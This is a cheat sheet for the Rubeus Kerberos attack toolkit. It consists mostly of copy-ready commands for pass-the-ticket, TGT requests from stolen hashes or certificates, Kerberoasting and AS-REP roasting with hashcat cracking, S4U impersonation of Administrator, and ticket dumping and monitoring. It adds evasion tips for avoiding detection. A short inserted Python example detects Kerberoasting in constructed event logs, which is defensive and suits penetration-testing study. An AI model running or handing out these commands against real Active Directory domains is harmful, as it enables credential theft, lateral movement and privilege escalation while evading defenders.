Rubeus

Rubeus is a C# toolkit for Kerberos interaction and abuse, developed by Will Schroeder (harmj0y) as part of the GhostPack project. It provides extensive functionality for Kerberos ticket manipulation, credential extraction, and various Kerberos-based attacks.

Key Capabilities

  • Ticket Operations: Dump, request, renew, describe, and import Kerberos tickets
  • Pass the Ticket: Import tickets into the current session for lateral movement
  • Pass the Key / OverPass the Hash: Request TGTs using password hashes
  • Kerberoasting: Extract service ticket hashes for offline cracking
  • AS-REP Roasting: Extract hashes from accounts without pre-authentication
  • Constrained Delegation Abuse: S4U2Self and S4U2Proxy attacks
  • Ticket Forging: Create Golden and Silver tickets (with appropriate hashes)
  • PKINIT: Request TGTs using X.509 certificates (Pass-the-Certificate)

Installation

Rubeus is not installed via package managers. Compile from source or download pre-compiled:

https://github.com/GhostPack/Rubeus

Compile with Visual Studio or use pre-compiled versions from various pentesting resources.
Basic Usage

Dump All Tickets

Rubeus.exe dump /nowrap

The /nowrap option prevents line wrapping in Base64 output for easier copy-paste.

Triage (List Current Tickets)

Rubeus.exe triage

Request a TGT

Using NTLM hash (RC4):

Rubeus.exe asktgt /user:john /domain:domain.local /rc4:64F12CDDAA88057E06A81B54E73B949B /nowrap

Using AES256 hash:

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap

Using password:

Rubeus.exe asktgt /user:john /domain:domain.local /password:Password123! /nowrap

Request TGT and Import into Session

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt

PKINIT (Certificate Authentication)

Request TGT using an X.509 certificate instead of a hash. Used in Pass-the-Certificate attacks after obtaining certificates from AD CS exploitation or Shadow Credentials attacks.

Request TGT with PFX Certificate

Rubeus.exe asktgt /user:john /domain:domain.local /certificate:C:\path\to\cert.pfx /password:PfxPassword123 /nowrap

Request TGT with Base64 Certificate

Rubeus.exe asktgt /user:john /domain:domain.local /certificate:<base64_pfx> /password:<pfx_password> /ptt

PKINIT Options

Option                          Description
/certificate:<path_or_base64>   Path to PFX file or Base64-encoded certificate
/password:<password>            Password for the PFX file

Note: If PKINIT is not supported by the KDC, use tools like gettgtpkinit.py from PKINITtools or PassTheCert for LDAPS authentication.
Pass the Ticket (PtT)

Import .kirbi File

Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-john@krbtgt-domain.local.kirbi

Import Base64 Ticket

Rubeus.exe ptt /ticket:doIFqDCCBaSgAwIBBaEDAgEWooIEoj...

After importing, access resources in the user’s context:

dir \\DC01.domain.local\c$

Sacrificial Process (createnetonly)

Create a new logon session to avoid overwriting existing tickets:

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

In the spawned window, request and import a ticket:

Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt

Use PowerShell remoting to access the target:

Enter-PSSession -ComputerName DC01

Kerberoasting

Extract All Kerberoastable Hashes

Rubeus.exe kerberoast /nowrap

Specific User

Rubeus.exe kerberoast /user:svc_mssql /nowrap

Hashcat-Compatible Format

Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast.txt

Request AES Tickets (Harder to Crack)

Rubeus.exe kerberoast /aes /nowrap

Crack with Hashcat:

hashcat -m 13100 kerberoast.txt wordlist.txt

AS-REP Roasting

Target accounts with “Do not require Kerberos preauthentication” enabled:

Extract All AS-REP Roastable Hashes

Rubeus.exe asreproast /nowrap

Specific User

Rubeus.exe asreproast /user:svc_backup /nowrap

Hashcat Format

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Crack with Hashcat:

hashcat -m 18200 asrep.txt wordlist.txt

Request Service Tickets (asktgs)

Request a TGS using an existing TGT:

Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/fileserver.domain.local /nowrap

Request and import:

Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/fileserver.domain.local /ptt

Constrained Delegation Abuse (S4U)

When a service account has constrained delegation configured:

Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.domain.local /ptt

With alternate service:

Rubeus.exe s4u /user:svc_sql /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.domain.local /altservice:http /ptt

Ticket Operations

Describe a Ticket

Rubeus.exe describe /ticket:<base64_or_path>

Shows ticket details including:

  • Service name
  • User name
  • Start/End times
  • Flags
  • Encryption type

Renew a TGT

Rubeus.exe renew /ticket:<base64_or_path> /nowrap

Purge All Tickets

Rubeus.exe purge

Purge Specific LUID

Rubeus.exe purge /luid:0x6c680

Hash Calculation

Calculate Kerberos hashes from a plaintext password:

Rubeus.exe hash /user:john /domain:domain.local /password:Password123!

Output:

rc4_hmac             : 64F12CDDAA88057E06A81B54E73B949B
aes128_cts_hmac_sha1 : 9e5f1e63b7b3e8f...
aes256_cts_hmac_sha1 : b21c99fc068e3ab...
des_cbc_md5          : ...

Monitoring for Tickets

Monitor for new TGTs (useful during lateral movement):

Rubeus.exe monitor /interval:5

Filter for specific user:

Rubeus.exe monitor /interval:5 /filteruser:Administrator

Common Options

Option              Description
/nowrap             Don’t wrap Base64 output
/ptt                Import ticket into current session
/dc:<ip>            Specify domain controller
/domain:<domain>    Specify domain name
/user:<user>        Specify username
/outfile:<path>     Save output to file
/luid:<luid>        Target specific logon session
/format:hashcat     Output in Hashcat-compatible format

PowerShell Helpers

Convert .kirbi to Base64

[Convert]::ToBase64String([IO.File]::ReadAllBytes("ticket.kirbi"))

Convert Base64 to .kirbi

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64>"))

Detection and Evasion

Common Detection Points

  • Unusual Kerberos ticket requests (Event ID 4768, 4769)
  • Service ticket requests for sensitive SPNs
  • AS-REQ without pre-authentication
  • High volume of TGS requests (Kerberoasting)
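
The first, third and fourth detection points above, as an added toy example (not code from this page or from Rubeus): it runs over constructed 4768/4769 records with shortened field names, flagging AS-REQs that carried no pre-authentication and accounts that requested many distinct RC4-encrypted service tickets, the Kerberoasting pattern.

```python
"""Toy detection over constructed Windows Security events (not real logs).

Field names are shortened versions of the 4768 (TGT request) and
4769 (service ticket request) event schema: TicketEncryptionType 0x17
is RC4-HMAC and 0x12 is AES256; PreAuthType 0 means the AS-REQ carried
no pre-authentication, so the AS-REP is roastable offline.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed sample events; values are illustrative, not captured data.
EVENTS = [
    {"id": 4768, "account": "john", "ip": "10.0.0.5", "etype": "0x12", "preauth": "2"},
    {"id": 4768, "account": "svc_backup", "ip": "10.0.0.9", "etype": "0x17", "preauth": "0"},
    {"id": 4769, "account": "john", "ip": "10.0.0.5", "etype": "0x17", "spn": "MSSQLSvc/sql01.domain.local"},
    {"id": 4769, "account": "john", "ip": "10.0.0.5", "etype": "0x17", "spn": "http/web01.domain.local"},
    {"id": 4769, "account": "john", "ip": "10.0.0.5", "etype": "0x17", "spn": "svc_report/rpt01.domain.local"},
    {"id": 4769, "account": "alice", "ip": "10.0.0.7", "etype": "0x12", "spn": "cifs/fileserver.domain.local"},
]


def asrep_roastable_requests(events):
    """Accounts whose 4768 events show PreAuthType 0 (no pre-authentication)."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e["preauth"] == "0"})


def kerberoast_candidates(events, threshold=3):
    """Group RC4 4769 events by (account, source IP) and count distinct SPNs.

    Many distinct SPNs requested with RC4 from one source matches the
    Kerberoasting pattern; AES-encrypted requests are not counted, which
    is exactly why the /aes option above lowers the footprint.
    """
    spns = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC:
            spns[(e["account"], e["ip"])].add(e["spn"])
    return {key: len(names) for key, names in spns.items() if len(names) >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable_requests(EVENTS))
    print("Kerberoast candidates:", kerberoast_candidates(EVENTS))
```

The threshold is deliberately low for the six-record sample; a real deployment would count per time window and baseline normal SPN volume per account.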

Evasion Techniques

  • Use AES encryption instead of RC4 (less suspicious)
  • Use /opsec flag for reduced detection footprint
  • Limit ticket requests to avoid anomaly detection
  • Use sacrificial processes to isolate activity

Tool          Description
Mimikatz      Windows credential extraction and ticket manipulation
Impacket      Python toolkit with GetTGT, GetST, GetUserSPNs
Kekeo         Advanced Kerberos toolkit by gentilkiwi
PowerView     PowerShell AD enumeration
BloodHound    AD attack path mapping

Core Takeaways

  • Use /nowrap for Base64 output to simplify copy-paste
  • asktgt with /ptt is the quickest way to request and use a ticket
  • createnetonly prevents overwriting your current session’s tickets
  • Kerberoasting and AS-REP roasting are key techniques for credential extraction
  • S4U attacks enable impersonation when constrained delegation is configured
  • AES256 is preferred over RC4 for both security and stealth